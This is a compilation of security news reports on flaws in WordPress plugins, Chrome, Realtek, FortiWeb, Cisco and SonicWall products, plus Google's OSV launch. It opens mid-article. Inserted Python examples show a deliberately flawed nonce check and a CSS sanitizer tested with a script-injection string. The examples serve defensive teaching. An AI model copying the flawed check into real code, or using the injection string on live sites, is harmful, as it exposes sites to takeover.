CSRF is a type of web flaw that allows an attacker to trick web browsers into performing malicious, unauthorized commands. Typically, CSRF attacks are carried out by attackers with a link sent to the victim – and using social engineering to persuade them to click on it. When victims click on the link, they are inadvertently sending a forged request to a server – resulting in the attacker being able to perform various commands.

Critical NextGen Gallery Security Flaw
The more serious of the two flaws is a critical-severity vulnerability (CVE-2020-35942). The flaw stems from NextGen Gallery’s security function (is_authorized_request) that is used to protect its various settings. This feature integrates both a capability check and a nonce check into a single function for easier application throughout the plugin.

“Unfortunately, a logic flaw in the is_authorized_request function meant that the nonce check would allow requests to proceed if the $_REQUEST['nonce'] parameter was missing, rather than invalid,” said researchers.

This could have allowed bad actors to carry out various attacks. To exploit this flaw, an attacker would have to trick an administrator into clicking a link. This would then submit crafted requests to perform various malicious actions, said researchers.

A successful attack “would require two separate requests, though this would be trivial to implement and we were able to do so during our testing,” researchers said. And, “the site would require at least one album to be published and accessible to the attacker.”

If an attacker successfully persuaded an admin to click on a link, the uploaded file would then be included and executed whenever the selected album type was viewed on the site. Any JavaScript included in the uploaded file would then also be executed, said researchers.

“As a reminder, once an attacker achieves remote code execution on a website, they have effectively taken over that site,” said researchers. “XSS can likewise be used to take over a site if a logged-in administrator visits a page running a malicious injected script.”

High-Severity File-Upload Security Flaw
A second, similar logic flaw (CVE-2020-35943) stemmed from a separate security function, validate_ajax_request, used for various AJAX actions including those used to upload images.

“This function had a similar logic flaw that would allow requests to proceed if the $_REQUEST['nonce'] parameter was missing, rather than invalid,” said researchers.

Attackers could trick an administrator into submitting a request crafted to upload an arbitrary image file. While the uploaded file had to be a valid image file, it is possible to hide a webshell or other malicious, executable PHP code within such an image file, they said.

“This could also be combined with the previous vulnerability, and the image file could be set as a ‘Legacy Template,’ at which point it would be included and the code within would be executed,” said researchers. “Again, this would require some degree of social engineering, as an attacker would have to trick an administrator into clicking a link that resulted in these requests being sent.”
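The missing-versus-invalid distinction that both NextGen Gallery flaws share is easiest to see in code. The following Python model is an added example, not NextGen Gallery's or Wordfence's code: it sketches an HMAC-based, time-windowed nonce (modelled loosely on the WordPress nonce scheme, with a constructed site secret) and places the flawed authorization check, which only verifies the nonce when the parameter happens to be present, beside the corrected one, which treats an absent nonce exactly like an invalid one. The function names, the `request` dictionary and the `user_can_manage` flag standing in for the capability check are all assumptions made for the example.

```python
import hashlib
import hmac
import time

# Constructed site secret; a real site keeps its own secret in configuration.
SITE_SECRET = b"constructed-secret-for-this-example-only"
# A nonce is accepted for the current and the previous tick (WordPress uses a
# 12-hour tick, giving a 12- to 24-hour lifetime).
TICK_SECONDS = 12 * 60 * 60


def create_nonce(user_id, action, now=None):
    """Per-user, per-action token bound to a time window (HMAC-based,
    modelled loosely on the WordPress scheme; not WordPress code)."""
    now = time.time() if now is None else now
    tick = int(now // TICK_SECONDS)
    message = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SITE_SECRET, message, hashlib.sha256).hexdigest()[:16]


def verify_nonce(nonce, user_id, action, now=None):
    """Accept a nonce minted in the current or the previous tick, compared in
    constant time."""
    now = time.time() if now is None else now
    for age in (0, TICK_SECONDS):
        expected = create_nonce(user_id, action, now - age)
        if hmac.compare_digest(expected.encode(), str(nonce).encode()):
            return True
    return False


def is_authorized_request_flawed(request, user_can_manage, user_id, action):
    """The logic flaw the advisory describes: the capability check is right,
    but the nonce is verified only when the parameter is present, so a forged
    cross-site request that omits the parameter entirely is let through."""
    if not user_can_manage:
        return False
    if "nonce" in request and not verify_nonce(request["nonce"], user_id, action):
        return False
    return True


def is_authorized_request_fixed(request, user_can_manage, user_id, action):
    """Corrected check: a missing nonce is rejected exactly like an invalid
    one, so every state-changing request must carry a token bound to the
    logged-in user and the specific action."""
    if not user_can_manage:
        return False
    nonce = request.get("nonce")
    if nonce is None or not verify_nonce(nonce, user_id, action):
        return False
    return True


if __name__ == "__main__":
    forged = {}  # a request triggered from another site cannot carry the admin's nonce
    print("flawed check accepts nonce-less request:",
          is_authorized_request_flawed(forged, True, 1, "save_settings"))
    print("fixed check accepts nonce-less request:",
          is_authorized_request_fixed(forged, True, 1, "save_settings"))
```

The same shape applies to the AJAX upload path: whatever the capability check says, the request must fail closed when the token is absent, and the token must be bound to both the user and the action so that one leaked nonce cannot be replayed against a different handler.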

Update to NextGen Gallery Version 3.5.0
The developer of NextGen Gallery, Imagely, has issued patches for these flaws in version 3.5.0. According to the NextGen Gallery plugin page, only 26.2 percent of users are utilizing version 3.5. Threatpost has reached out to Imagely for further comment.

The number of installs for each version of NextGen Gallery. Credit: Imagely

“If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as these are critical and high severity vulnerabilities that can lead to full site takeover,” said researchers.

The flaw is only the latest to plague a WordPress plugin. Last week, a security bug in Contact Form 7 Style, a WordPress plugin installed on over 50,000 sites, was reported that could allow for malicious JavaScript injection on a victim website. And in January, two flaws (one critical) in a WordPress plugin called Orbit Fox were found that could allow attackers to inject malicious code into vulnerable websites, or take control of a website.


Google launches Open Source Vulnerabilities (OSV) database
9.2.2021 
Vulnerebility  Securityaffairs

Google announced the launch of OSV (Open Source Vulnerabilities), a vulnerability database and triage infrastructure for open source projects.
Google last week announced the OSV (Open Source Vulnerabilities), a vulnerability database and triage infrastructure for open source projects.

The database aims at helping both open source maintainers and consumers of open source projects.

The database could allow users and maintainers of open-source software to find the vulnerabilities that affect them, providing detailed information about the versions and commits impacted by each issue. Maintainers of open source software could benefit from OSV’s automation to reduce the burden of triage.

“We are excited to launch OSV (Open Source Vulnerabilities), our first step towards improving vulnerability triage for developers and consumers of open source software.” reads the post published by Google. “The goal of OSV is to provide precise data on where a vulnerability was introduced and where it got fixed, thereby helping consumers of open source software accurately identify if they are impacted and then make security fixes as quickly as possible.”

At the time of the launch, the database only includes vulnerabilities from OSS-Fuzz (mostly C/C++), but Google plans to add more data sources soon (e.g. npm Registry and PyPI).
OSV already includes information on thousands of vulnerabilities from more than 380 critical open source projects integrated with Google’s OSS-Fuzz fuzzing service.

“OSV is a vulnerability database for open source projects. It exposes an API that lets users of these projects query whether or not their versions are impacted.” reads the description of the project.

“For each vulnerability, we perform bisects to figure out the exact commit that introduces the bug, as well the exact commit that fixes it. This is cross referenced against upstream repositories to figure out the affected tags and commit ranges.”

The OSV database exposes a simple API for vulnerability queries: maintainers and users can provide a git commit hash or a version number and receive the list of vulnerabilities present in that version.

“Similarly, it is time consuming for maintainers to determine an accurate list of affected versions or commits across all their branches for downstream consumers after a vulnerability is fixed, in addition to the process required for publication.” continues Google. “Unfortunately, many open source projects, including ones that are critical to modern infrastructure, are under resourced and overworked. Maintainers don’t always have the bandwidth to create and publish thorough, accurate information about their vulnerabilities even if they want to.”

The OSV aims at rethinking and promoting better, scalable vulnerability tracking for open source.

“In an ideal world, vulnerability management should be done closer to the actual open source development process, aided by automated infrastructure. Projects that depend on open source should be promptly notified and fixes uptaken quickly when a vulnerability is reported,” Google closes.

Users can access the OSV website and documentation at https://osv.dev and explore the open source repository or contribute to the project on GitHub. Google has also set up a mailing list for staying up to date with OSV and sharing feedback on vulnerability tracking.


Google Launches Database for Open Source Vulnerabilities
9.2.2021 
Vulnerebility  Securityweek

Google last week announced the launch of OSV (Open Source Vulnerabilities), which the internet giant has described as a vulnerability database and triage infrastructure for open source projects.

OSV should make it easier for the users of open source software to find out which vulnerabilities impact them. It can also help maintainers of open source software accurately identify all versions and commits impacted by a flaw across all their branches.

For consumers, Google says OSV provides a database that can be easily queried, with its goal being to complement existing vulnerability databases.

“OSV automates the triage workflow for an open source package consumer by providing an API to query for vulnerabilities,” Google’s security team said in a blog post.

In the case of maintainers, they can obtain information on the impact of vulnerabilities by providing the commit that introduced a bug and the commit that patched it.

“Unfortunately, many open source projects, including ones that are critical to modern infrastructure, are under resourced and overworked. Maintainers don't always have the bandwidth to create and publish thorough, accurate information about their vulnerabilities even if they want to,” Google’s security experts said.

OSV currently stores information on thousands of vulnerabilities from more than 380 critical open source projects integrated with Google’s OSS-Fuzz fuzzing service. However, the company wants to extend it with data from repositories such as npm Registry and PyPI. It also wants to make it very easy for developers to submit information on vulnerabilities.

“Our goal with OSV is to rethink and promote better, scalable vulnerability tracking for open source. In an ideal world, vulnerability management should be done closer to the actual open source development process, aided by automated infrastructure. Projects that depend on open source should be promptly notified and fixes uptaken quickly when a vulnerability is reported,” Google said.
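Both OSV write-ups above describe the same idea: each vulnerability is pinned to the commit that introduced it and the commit that fixed it, and a query by commit hash or by version is answered by checking whether the queried point in history contains the first commit but not the second. The following Python block is an added example, not OSV's own code, that implements that check over a constructed commit graph with a release branch, so that a fix landed on the main branch but not backported to the release branch is reported correctly. The commit names, tags, vulnerability records and function names are all constructed for the example; the real service resolves such ranges against the upstream repositories.

```python
from collections import deque

# Constructed commit graph (child -> parents), with a release branch cut at c3:
#   a1 -- b2 -- c3 -- d4 -- e5      main
#                \
#                 f6 -- g7          release branch
HISTORY = {
    "a1": [],
    "b2": ["a1"],
    "c3": ["b2"],
    "d4": ["c3"],
    "e5": ["d4"],
    "f6": ["c3"],
    "g7": ["f6"],
}

# Constructed tags mapping a version name to the commit it points at.
TAGS = {"v1.0": "b2", "v1.1": "c3", "v1.2": "e5", "v1.1.1": "g7"}

# Constructed vulnerability records in the introduced/fixed form the
# announcement describes; fixed=None means no fix has landed yet.
VULNS = [
    {"id": "EXAMPLE-0001", "introduced": "b2", "fixed": "d4"},
    {"id": "EXAMPLE-0002", "introduced": "f6", "fixed": None},
]


def contains_commit(history, commit, target):
    """True if `target` is `commit` itself or one of its ancestors
    (breadth-first walk over parent links, safe on merge commits)."""
    seen = set()
    queue = deque([commit])
    while queue:
        cur = queue.popleft()
        if cur == target:
            return True
        if cur in seen:
            continue
        seen.add(cur)
        queue.extend(history.get(cur, []))
    return False


def commit_is_affected(history, commit, introduced, fixed=None):
    """Affected means: the tree at `commit` contains the introducing commit
    and does not contain the fixing commit."""
    if not contains_commit(history, commit, introduced):
        return False
    if fixed is not None and contains_commit(history, commit, fixed):
        return False
    return True


def affected_tags(history, tags, introduced, fixed=None):
    """Which released versions carry the bug; this is the list a maintainer
    would publish for downstream consumers."""
    return sorted(
        tag for tag, commit in tags.items()
        if commit_is_affected(history, commit, introduced, fixed)
    )


def query_vulns(history, tags, vulns, commit=None, version=None):
    """Answer a consumer query by commit hash or by version tag, returning
    the ids of the vulnerabilities present at that point in history."""
    if version is not None:
        commit = tags[version]
    if commit is None:
        raise ValueError("give either a commit or a version")
    return [
        v["id"] for v in vulns
        if commit_is_affected(history, commit, v["introduced"], v["fixed"])
    ]


if __name__ == "__main__":
    print("tags affected by EXAMPLE-0001:", affected_tags(HISTORY, TAGS, "b2", "d4"))
    print("vulns at v1.1.1:", query_vulns(HISTORY, TAGS, VULNS, version="v1.1.1"))
    print("vulns at e5:", query_vulns(HISTORY, TAGS, VULNS, commit="e5"))
```

The release tag v1.1.1 is the instructive case: it was cut after the introducing commit but its branch never received the fix, so a version-based lookup must still report EXAMPLE-0001 there even though the main branch at v1.2 is clean.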


Experts found critical flaws in Realtek Wi-Fi Module
7.2.2021 
Vulnerebility  Thehackernews

Critical flaws in the Realtek RTL8195A Wi-Fi module could have been exploited to gain root access and take over devices’ wireless communications.
Researchers from Israeli IoT security firm Vdoo found six vulnerabilities in the Realtek RTL8195A Wi-Fi module that could have been exploited to gain root access and take control of a device’s wireless communications.

The Realtek RTL8195AM is a highly integrated single-chip with a low-power-consumption mechanism ideal for IoT (Internet of Things) applications in multiple industries.

The module implements an “Ameba” API to allow developers to communicate with the device via Wi-Fi, HTTP, and MQTT, which is a lightweight messaging protocol for small sensors and mobile devices.

Realtek supplies their own “Ameba” API to be used with the device, which allows any developer to communicate easily via Wi-Fi, HTTP, mDNS, MQTT and more.

“As part of the module’s Wi-Fi functionality, the module supports the WEP, WPA and WPA2 authentication modes.” reads the analysis published by the experts.

“In our security assessment, we have discovered that the WPA2 handshake mechanism is vulnerable to various stack overflow and read out-of-bounds issues.”

The flaws discovered by the experts are stack overflow and out-of-bounds read issues related to the Wi-Fi module’s WPA2 four-way handshake mechanism during authentication.

The vulnerabilities discovered by Vdoo also impact other modules, including RTL8711AM, RTL8711AF, and RTL8710AF.

“The most severe issue we discovered is VD-1406, a remote stack overflow that allows an attacker in the proximity of an RTL8195 module to completely take over the module, without knowing the Wi-Fi network password (PSK) and regardless of whether the module is acting as a Wi-Fi access point or client. The attack scenarios are detailed in the next section: ‘Technical Deep-Dive’.” reads the analysis.

The most severe vulnerability, tracked as CVE-2020-9395, is a remote stack overflow that could be exploited by attackers in the proximity of a vulnerable RTL8195 module to completely take over it. The experts pointed out that the attackers don’t need the knowledge of the Wi-Fi network password (PSK) or whether the module is acting as a Wi-Fi access point or client.

The experts discovered two denial-of-service flaws and three flaws that could allow an attacker to exploit Wi-Fi client devices and execute arbitrary code.

Below is the full list of flaws discovered by the experts:

VD-1406 (CVE-2020-9395) – Stack-based buffer overflow vulnerability
VD-1407 (CVE-2020-25853) – Read out of bounds vulnerability
VD-1408 (CVE-2020-25854) – Stack-based buffer overflow vulnerability
VD-1409 (CVE-2020-25855) – Stack-based buffer overflow vulnerability
VD-1410 (CVE-2020-25856) – Stack-based buffer overflow vulnerability
VD-1411 (CVE-2020-25857) – Stack-based buffer overflow vulnerability

In order to address the flaws, users have to download the updated versions of the Ameba SDK from Realtek’s website. The latest version of Ameba Arduino (2.0.8) contains patches for all the above issues.


Unpatched WordPress Plugin Code-Injection Bug Afflicts 50K Sites

6.2.2021  Vulnerebility  Threatpost

A CSRF-to-stored-XSS security bug plagues 50,000 ‘Contact Form 7 Style’ users.

A security bug in Contact Form 7 Style, a WordPress plugin installed on over 50,000 sites, could allow for malicious JavaScript injection on a victim website.

The latest WordPress plugin security vulnerability is a cross-site request forgery (CSRF) to stored cross-site scripting (XSS) problem in Contact Form 7 Style, which is an add-on to the well-known Contact Form 7 umbrella plugin. It ranks 8.8 out of 10 on the CVSS vulnerability-severity scale (CVE is pending).

CSRF allows an attacker to induce a victim user to perform actions that they do not intend to. XSS allows an attacker to execute arbitrary JavaScript within the browser of a victim user. This bug connects the two approaches.

Researchers at Wordfence said that there’s no patch yet available, and versions 3.1.9 and below are affected. WordPress removed the plugin from the WordPress plugin repository on Feb. 1.

Vulnerable Contact Form 7 Style
Contact Form 7 is used to create, as its name suggests, contact forms used by websites. The vulnerable Contact Form 7 Style is an add-on that can be used to add additional bells and whistles to those forms that are made with Contact Form 7.

It does this by allowing users to customize a site’s Cascading Style Sheets (CSS) code, which is used to dictate the appearance of WordPress-based websites. This is where the vulnerability lies, according to Wordfence researchers.

“Due to the lack of sanitization and lack of nonce protection on this feature, an attacker could craft a request to inject malicious JavaScript on a site using the plugin,” they explained, in a posting this week, adding that further details will be withheld to give site owners a chance to address the issue. “If an attacker successfully tricked a site’s administrator into clicking a link or attachment, then the request could be sent and the CSS settings would be successfully updated to include malicious JavaScript.”
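For the sanitization half of that description, here is an added Python example (not the plugin's or Wordfence's code) of how stored custom CSS can be neutralised before it is echoed inside a `<style>` element: every `<` is replaced with its CSS hex escape, so the text keeps its meaning inside a CSS string or identifier but can never terminate the element or open a `<script>` tag, and legacy constructs that let a stylesheet run script in old engines are dropped. The function names and the constructed inputs are assumptions; in a WordPress plugin this filter would sit in the settings handler next to the nonce and capability checks.

```python
import re

# CSS hex escape for "<". Inside a CSS string or identifier it still means "<",
# but the HTML parser never sees a literal "<", so the stored text cannot end
# the <style> element or start a tag.
LT_ESCAPE = "\\3c "

# Constructs that let a stylesheet run script or load code in legacy engines.
SCRIPT_PATTERNS = [
    re.compile(r"expression\s*\(", re.IGNORECASE),
    re.compile(r"behavior\s*:", re.IGNORECASE),
    re.compile(r"-moz-binding\s*:", re.IGNORECASE),
    re.compile(r"javascript\s*:", re.IGNORECASE),
    re.compile(r"vbscript\s*:", re.IGNORECASE),
]


def sanitize_custom_css(css):
    """Return user-supplied CSS that is safe to embed inside a <style> element."""
    css = css.replace("<", LT_ESCAPE)
    for pattern in SCRIPT_PATTERNS:
        css = pattern.sub("", css)
    return css


def css_is_suspicious(css):
    """Detection-side check: True if the raw input would be altered by the
    sanitizer, which is worth logging as a possible injection attempt."""
    return sanitize_custom_css(css) != css


def render_style_block(css):
    """Embed sanitized CSS in a <style> element; the output contains exactly
    one closing tag regardless of the input."""
    return "<style>\n" + sanitize_custom_css(css) + "\n</style>"


if __name__ == "__main__":
    # Constructed inputs: one benign stylesheet, one that tries to break out.
    benign = ".wpcf7 input{border:1px solid #ccc}"
    hostile = "body{color:red}</style><script>alert(1)</script>"
    for sample in (benign, hostile):
        print("suspicious:", css_is_suspicious(sample))
        print(render_style_block(sample))
```

Escaping rather than deleting `<` keeps legitimate selectors and strings intact, and the `css_is_suspicious` check gives the site a signal to log or alert on whenever an update to the CSS setting would have needed sanitizing at all.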

Since the number of installed instances of the plugin is so high, Wordfence is holding back specifics: “Due to the number of sites affected by this plugin’s closure, we are intentionally providing minimal details about this vulnerability to provide users ample time to find an alternative solution. We may provide additional details later as we continue to monitor the situation.”

To exploit the flaw, cyberattackers would need to convince a logged-in administrator to click on a malicious link, which can be done via any of the common social-engineering approaches (i.e., through a fraudulent email or instant message).

Wordfence notified the plugin’s developer about the bug in early December; after receiving no response, the researchers then escalated the issue to the WordPress Plugins team in early January. The WordPress Plugins team also contacted the developer with no response, leading to the disclosure this week.

How to Protect Against Malicious JavaScript Injection
Because, as with all CSRF vulnerabilities, the bug can only be exploited if an admin user performs an action while authenticated to the vulnerable WordPress site, admins should always be wary when clicking on any links.

“If you feel you must click a link, we recommend using incognito windows when you are unsure about a link or attachment,” according to Wordfence. “This precaution can protect your site from being successfully exploited by this vulnerability along with all other CSRF vulnerabilities.”

In this case, users should also deactivate and remove the Contact Form 7 Style plugin and find a replacement, researchers added, since no patch appears to be forthcoming.


Google Chrome Zero-Day Afflicts Windows, Mac Users

6.2.2021  Vulnerebility  Threatpost

Google warns of a zero-day vulnerability in the V8 open-source engine that’s being actively exploited by attackers.

Google is warning of a zero-day vulnerability in its V8 open-source web engine that’s being actively exploited by attackers.

A patch has been issued in version 88 of Google’s Chrome browser — specifically, version 88.0.4324.150 for Windows, Mac and Linux. This update will roll out over the coming days and weeks, said Google. The flaw (CVE-2021-21148) stems from a heap-buffer overflow, said Google.

“Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild,” according to Google’s Thursday security update.

What is a Heap-Buffer Overflow Security Flaw?
A heap-buffer overflow flaw, as its name suggests, is a type of buffer-overflow error. This is a class of vulnerability where the region of a process’ memory used to store dynamic variables (the heap) can be overwhelmed. If a buffer overflow occurs, it typically causes the affected program to behave incorrectly, according to researchers with Imperva – causing memory access errors and crashes — and opening the door to remote code execution.

However, beyond classifying the flaw as a heap-buffer overflow, Google did not specify the potential impact of this vulnerability. In fact, details of the bug overall (including how it can be exploited) remain scant while Google works to push out the fixes.

“Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” said Google. “We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on, but haven’t yet fixed.”

What is the V8 JavaScript Engine?
The heap-buffer overflow error exists in V8, an open-source WebAssembly and JavaScript engine developed by the Chromium Project for Google Chrome and Chromium web browsers. V8, which is written in C++, can run stand-alone, or can be embedded into any C++ application.

Bugs have previously been discovered (and exploited) in V8, including a flaw in November that was high-severity and tied to active exploits. That flaw was only described as an “inappropriate implementation in V8.”

Security Researchers: Targets for Chrome Zero-Day Exploits?
While Google didn’t provide further details of the attackers exploiting the flaw, researchers with Malwarebytes on Friday made a “general assumption” that the attack “was used against security researchers working on vulnerability research and development at different companies and organizations.”

They pointed to the timing of when the vulnerability was reported to Google by Mattias Buelens (Jan. 24) and when a report was released by Google’s Threat Analysis Group (Jan. 26). That report by Google researchers revealed that hackers linked to North Korea were targeting security researchers with an elaborate social-engineering campaign that set up trusted relationships with them — and then infected their organizations’ systems with custom backdoor malware.

“One of the methods the attackers used was to interact with the researchers and get them to follow a link on Twitter to a write-up hosted on a malicious website,” said researchers with Malwarebytes. “Shortly after the visit, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin to communicate with a command and control (C&C) server. This sure sounds like something that could be accomplished using a heap buffer overflow in a browser.”

However, Google has not confirmed any correlation with this attack.

Google Chrome Browser: How to Update
Researchers urge Google Chrome users to update as soon as possible. Chrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:

Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome
If an update is available Chrome will notify users and then start the download process
Users can then relaunch the browser to complete the update

Google Chrome Cybersecurity Flaws Continue
The flaw is only the latest security issue in Google Chrome in recent months. In January, the Cybersecurity and Infrastructure Security Agency (CISA) urged Windows, macOS and Linux users of Google’s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.

And in December, Google updated Chrome to fix four bugs with a severity rating of “high” and eight overall. Three were use-after-free flaws, which could allow an adversary to generate an error in the browser’s memory, opening the door to a browser hack and host computer compromise.


Fortinet addresses 4 vulnerabilities in FortiWeb web application firewalls
6.2.2021 
Vulnerebility  Securityaffairs

Security vendor Fortinet has addressed four vulnerabilities in FortiWeb web application firewalls, including a Remote Code Execution flaw.
Fortinet has addressed four vulnerabilities in FortiWeb web application firewalls that were reported by Positive Technologies expert Andrey Medov.

The first vulnerability, tracked as CVE-2020-29015, is a blind SQL injection that resides in the FortiWeb user interface. The flaw could be exploited by an unauthorized attacker to remotely execute arbitrary SQL queries by sending a request with an authorization header containing a malicious SQL command.

“A blind SQL injection in the user interface of FortiWeb may allow an unauthenticated, remote attacker to execute arbitrary SQL queries or commands by sending a request with a crafted Authorization header containing a malicious SQL statement.” reads the advisory published by Fortinet.

The flaw received a CVSS score of 6.4/10; the vendor recommends updating FortiWeb 6.3.x and 6.2.x to versions 6.3.8 and 6.2.4, respectively.

Medov also found two stack buffer overflow issues, tracked as CVE-2020-29016 and CVE-2020-29019, both of which received a CVSS score of 6.4.

CVE-2020-29016 could be exploited by an unauthorized remote attacker to overwrite the content of the stack and execute arbitrary code by sending a request with a specially generated GET parameter certname.

Customers using FortiWeb 6.3.x and 6.2.x have to update to versions 6.3.6 and 6.2.4, respectively.

The CVE-2020-29019 vulnerability can be exploited by attackers to mount a DoS attack on the httpd daemon using a request with a specially crafted cookie parameter. The vendor recommends updating FortiWeb 6.3.x and 6.2.x to versions 6.3.8 and 6.2.4.

The fourth vulnerability, tracked as CVE-2020-29018, is a format string vulnerability that allows remote attackers to read memory contents, obtain sensitive data, and execute unauthorized code or commands using the redir parameter. The flaw received a CVSS score of 5.3; it has been addressed with the release of FortiWeb version 6.3.6.

“The most dangerous of these four vulnerabilities are the SQL Injection (CVE-2020-29015) and Buffer Overflow (CVE-2020-29016) as their exploitation does not require authorization.” Andrey Medov at Positive Technologies explains. “The first allows you to obtain the hash of the system administrator account due to excessive DBMS user privileges, which gives you access to the API without decrypting the hash value. The second one allows arbitrary code execution. Additionally, the format string vulnerability (CVE-2020-29018) also may allow code execution, but its exploitation requires authorization.”


Google Chrome, Microsoft IE Zero-Days in Crosshairs
6.2.2021 
Vulnerebility  Securityweek

Google late Thursday night shipped an emergency patch to close a Chrome browser vulnerability that was being used in mysterious zero-day attacks.

The Google Chrome patch, which is being pushed via the browser’s automatic self-patching, covers a critical vulnerability in V8, Google’s JavaScript and WebAssembly engine.

The “high-risk” vulnerability affects users on Windows, MacOS and Linux platforms.

The Google advisory is scant on details:

High CVE-2021-21148: Heap buffer overflow in V8. Reported by Mattias Buelens on 2021-01-24

Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild. We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.

Technical details on the flaw are being held private. The patch release comes amidst reports that a Google Chrome zero-day exploit was being used in the North Korean government-backed attacks against numerous researchers and personalities scattered across the offensive and defensive security space.

Beyond a blog post with the initial warning from its TAG (Threat Analysis Group), Google has been quiet on whether a Chrome zero-day was used in the North Korean social-engineering campaign and whether this latest patch provides cover for that vulnerability.

A source tells SecurityWeek the two issues are “unrelated” but stressed that a comprehensive investigation has not yet been completed.

Adding fuel to the fire, South Korean security vendor ENKI has published a claim that a Microsoft Internet Explorer (IE) browser zero-day may also be linked to the North Korean campaign. ENKI said its own researchers were targeted by the operation and the targeting method included the use of malicious MHTML files that led to drive-by IE downloads.

Strangely, public data shows that the Internet Explorer browser continues to be widely used in South Korea.

Microsoft has itself documented its own findings on the North Korean hacks against white-hat researchers, threat intel professionals and offensive security professionals but Microsoft does not mention the use of an Internet Explorer zero-day.

Microsoft does, however, describe the use of MHTML files aimed specifically at the older Internet Explorer:

In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.

A Microsoft spokesperson told SecurityWeek the ENKI findings were originally reported through what was described as an “incorrect channel.”

“Microsoft has a customer commitment to investigate reported security issues and we will provide updates for impacted devices as soon as possible.” the spokesperson added.

Security researchers at Kaspersky have linked the attacks to a sub-group under Lazarus, the infamous North Korean threat actor known for launching destructive malware and ransomware attacks across the globe.


Critical Flaws Reported in Cisco VPN Routers for Businesses—Patch ASAP
6.2.2021 
Vulnerebility  Thehackernews

Cisco has rolled out fixes for multiple critical vulnerabilities in the web-based management interface of Small Business routers that could potentially allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device.

The flaws — tracked from CVE-2021-1289 through CVE-2021-1295 (CVSS score 9.8) — impact RV160, RV160W, RV260, RV260P, and RV260W VPN routers running a firmware release earlier than Release 1.0.01.02.

Along with the aforementioned three vulnerabilities, patches have also been released for two more arbitrary file write flaws (CVE-2021-1296 and CVE-2021-1297) affecting the same set of VPN routers that could have made it possible for an adversary to overwrite arbitrary files on the vulnerable system.
All nine security issues were reported to the networking equipment maker by security researcher Takeshi Shiomitsu, who has previously uncovered similar critical flaws in RV110W, RV130W, and RV215W routers that could be leveraged for remote code execution (RCE) attacks.

While exact specifics of the vulnerabilities are still unclear, Cisco said the flaws —

CVE-2021-1289, CVE-2021-1290, CVE-2021-1291, CVE-2021-1292, CVE-2021-1293, CVE-2021-1294, and CVE-2021-1295 are a result of improper validation of HTTP requests, allowing an attacker to craft a specially-crafted HTTP request to the web-based management interface and achieve RCE.
CVE-2021-1296 and CVE-2021-1297 are due to insufficient input validation, permitting an attacker to exploit these flaws using the web-based management interface to upload a file to a location that they should not have access to.
Separately, another set of five glitches (CVE-2021-1314 through CVE-2021-1318) in the web-based management interface of Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 routers could have granted an attacker the ability to inject arbitrary commands on the routers that are executed with root privileges.

Lastly, Cisco also addressed 30 additional vulnerabilities (CVE-2021-1319 through CVE-2021-1348), affecting the same set of products, that could allow an authenticated, remote attacker to execute arbitrary code and even cause a denial-of-service condition.

"To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device," Cisco said in an advisory published on February 3.

Kai Cheng from the Institute of Information Engineering, which is part of the Chinese Academy of Sciences, has been credited with reporting the 35 flaws in the router management interface.

The company also noted there's been no evidence of active exploitation attempts in the wild for any of these flaws, nor are there any workarounds that address the vulnerabilities.


Google addresses Chrome zero-day flaw actively exploited in the wild
5.2.2021 
Vulnerebility  Securityaffairs

Google has addressed an actively exploited zero-day vulnerability, tracked as CVE-2021-21148, with the release of the Chrome 88.0.4324.150 version.
Google released Chrome 88.0.4324.150 version that addressed an actively exploited zero-day security vulnerability.

The vulnerability is a heap buffer overflow in V8, Google's open-source, high-performance JavaScript and WebAssembly engine, written in C++.

The flaw was rated by Google as high severity; it was reported by Mattias Buelens on January 24th, 2021.

The 88.0.4324.150 version of the Stable channel will be available for Windows, Mac and Linux in the coming days/weeks.

“CVE-2021-21148: Heap buffer overflow in V8. Reported by Mattias Buelens on 2021-01-24.” reads the announcement published by Google.

“Google is aware of reports that an exploit for CVE-2021-21148 exists in the wild. We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.”
Google did not share details about the attacks and the attackers.

“Access to bug details and links may be kept restricted until a majority of users are updated with a fix.” Google adds. “We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.”

In 2020, Google addressed five Chrome zero-days actively exploited in the wild.

In October, the IT giant addressed the following three zero-days:

CVE-2020-15999 – The flaw is a memory corruption bug that resides in the FreeType font rendering library, which is included in standard Chrome releases.
CVE-2020-16009 – is a Heap buffer overflow in Freetype in Google Chrome.
CVE-2020-16010 – affects the browser’s user interface (UI) component in Chrome for Android.
In November, the company addressed two other zero-day vulnerabilities, actively exploited in the wild.

Both zero-day flaws, tracked as CVE-2020-16013 and CVE-2020-16017, were reported by anonymous sources.


SonicWall released patch for actively exploited SMA 100 zero-day
5.2.2021 
Vulnerebility  Securityaffairs

SonicWall has released a security patch to address the zero-day flaw actively exploited in attacks against the SMA 100 series appliances.
SonicWall this week released firmware updates (version 10.2.0.5-29sv) to address an actively exploited zero-day vulnerability in Secure Mobile Access (SMA) 100 series appliances.

The vulnerability, tracked as CVE-2021-20016, has been rated as critical and received a CVSS score of 9.8.

The vulnerability is an improper SQL command neutralization issue in the SonicWall SSLVPN SMA100 product; it could be exploited by a remote, unauthenticated attacker to obtain credentials on SMA100 build version 10.x.

“A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker. This vulnerability impacts SMA100 build version 10.x.” reads the advisory.

Customers have to update their installs as soon as possible; the company also revealed that the update includes additional security enhancements.

